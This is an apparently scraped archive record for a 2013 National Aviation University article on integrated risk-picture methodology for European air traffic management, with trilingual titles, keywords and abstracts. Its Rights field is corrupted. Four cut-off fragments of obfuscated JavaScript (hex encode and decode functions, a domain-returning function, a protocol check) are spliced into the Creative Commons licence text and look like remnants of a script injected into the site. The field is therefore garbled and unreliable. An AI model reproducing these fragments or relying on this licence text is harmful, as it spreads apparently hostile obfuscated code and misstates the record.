Record Details

Методологія комплексного дослідження ризиків в системі організації повітряного руху в Європі

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title Методологія комплексного дослідження ризиків в системі організації повітряного руху в Європі
INTEGRATED RISK PICTURE METHODOLOGY FOR AIR TRAFFIC MANAGEMENT IN EUROPE
Методология комплексного исследования рисков в системе организации воздушного движения в Европе
 
Creator Kharchenko, Volodymyr; Національний авіаційний університет, проспект Космонавта Комарова, 1, Київ, Україна, 03680
Chynchenko, Yuriy; Національний авіаційний університет, проспект Космонавта Комарова, 1, Київ, Україна, 03680
 
Subject
безпека польотів; європейська програма організації повітряного руху; методологія комплексного дослідження ризиків; моделі ризиків; організація повітряного руху; оцінка ризиків; техніки моделювання ризиків в авіації
656.7.052(045)

Air Traffic Management; aviation risks modelling techniques; European Air Traffic Management programme; Integrated risk picture methodology; risk assessment; risk models; safety of flights
656.7.052(045)

безопасность полетов; европейская программа организации воздушного движения; методология комплексного исследования рисков; модели рисков; организация воздушного движения; оценка рисков; техники моделирования рисков в авиации
656.7.052(045)
 
Description  Проаналізовано методологію комплексного дослідження ризиків. Розглянуто переваги концепції, експлуатаційну документацію та потенційних користувачів методології комплексного дослідження ризиків. Показано вплив принципів впровадження методології на систему організації повітряного руху. Запропоновано загальні рекомендації, що можна використовувати в умовах аеронавігаційної системи України.
 The article deals with the analysis of the researches conducted in field of the Integrated risk picture methodology. Benefits of the concept, operational documentation and potential users of Integrated risk picture methodology have been reviewed. Principles of implementation and impact on Air Traffic Management have been analysed and general recommendations applicable for Ukrainian aeronautical system have been proposed.
 Проанализирована методология комплексного исследования рисков. Рассмотрены преимущества концепции, эксплуатационная документация и потенциальные пользователи методологии комплексного исследования рисков. Показано влияние принципов внедрения методологии на систему организации воздушного движения. Предложены общие рекомендации, которые можно использовать в условиях аэронавигационной системы Украины.
 
Publisher National Aviation University
 
Contributor


 
Date 2013-04-04
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/3857
10.18372/2306-1472.54.3857
 
Source Proceedings of the National Aviation University; Том 54, № 1 (2013); 15-20
Вестник Национального авиационного университета; Том 54, № 1 (2013); 15-20
Вісник Національного Авіаційного Університету; Том 54, № 1 (2013); 15-20
 
Language ru
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ